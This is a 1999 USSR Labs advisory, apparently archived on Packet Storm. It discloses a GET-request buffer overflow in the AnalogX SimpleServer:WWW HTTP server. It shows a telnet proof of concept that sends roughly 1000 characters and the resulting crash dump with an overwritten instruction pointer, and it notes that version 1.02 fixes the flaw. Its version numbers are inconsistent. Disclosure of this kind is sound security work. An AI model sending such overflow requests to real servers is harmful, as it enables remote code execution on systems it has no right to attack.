USSR Advisory #29 - Local / Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW HTTP Server v1.1
9d1fa2807b06e8fe862808a7755ecb23<html>
<head>
<title>u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<!--#exec cgi="/cgi-bin/hitslogger.cgi"-->
<body bgcolor="#FFFFFF" text="#000000" link="#486090" vlink="#485888" alink="#405888">
<table border="0" width="75%" cellspacing="20" cellpadding="20" height="576">
<tr>
<td height="941">
<center>
<table border="0" cellspacing="2" cellpadding="2" width="61%" height="602">
<tr>
<td colspan="2" align="LEFT" valign="MIDDLE" bgcolor="#309880" height="24">
<p><font face="Verdana" size="+1" color="#FFFFFF"> <a name="org"></a>Local
/ Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW
HTTP Server v1.01</font></p>
</td>
</tr>
<tr>
<td width="12%" align="LEFT" valign="TOP" height="5"> </td>
<td width="88%" align="LEFT" valign="TOP" height="5"> </td>
</tr>
<tr>
<th width="12%" align="LEFT" valign="TOP" height="17">
<p>AnalogX SimpleServer</p>
</th>
<td width="88%" align="LEFT" valign="TOP" height="17"><font face="Arial, Helvetica, sans-serif" size="2">
AnalogX SimpleServer:WWW HTTP Server v1.01</font></td>
</tr>
<tr>
<th width="12%" align="LEFT" valign="TOP" height="456">
<p> </p>
</th>
<td width="88%" align="LEFT" valign="TOP" height="456">
<pre>
USSR Advisory Code: <b>USSR-99029
</b>
<b>Release Date:
</b>December 31, 1999 [5/5] (not the original one), original [5/5]
will be released 15/01/1900 :)
<b>Systems Affected:
</b>AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly others versions.
<b>About The Software:
</b>Introducing AnalogX SimpleServer:WWW, the first in a series of simple to use yet
powerful servers! This webserver is SO easy to use, about the only thing you need
to know how to do is drag and drop files; then just click on the 'Start' button, and
you're webserver is up and running, serving your pages to the world!
SimpleServer:WWW supports MIME file typing, CGI, common log format,
and multi-hosting, just to name a few! If you've always wanted a compact,
easy to use, versatile webserver, then you're prayers have been answered.
<b>THE PROBLEM
</b>
UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands
has an unchecked buffer that will allow arbitrary code to be executed if it is
overflowed.
Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html
<b>Example
</b>[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>
Where [buffer] is aprox. 1000 characters. At his point the server overflows.
And in remote machine someone will be see something like this.
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:
Stack dump:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855 00afffbc 00af0114
bff87fe9 00af012c 00afffbc 00af0148 00af0104 41414141 00af02f0
<b>Vendor Status:
</b>Informed.
Vendor Url: http://www.analogx.com/
Program Url: http://www.analogx.com/contents/download/network/sswww.htm
<b>Credit:</b> USSRLABS
<b>SOLUTION
</b>Fixed in the version 1.02
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock Tellier,
Technotronic and Wiretrip.</pre>
</td>
</tr>
</table>
</center>
</td>
</tr>
</table>
</body>
</html>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!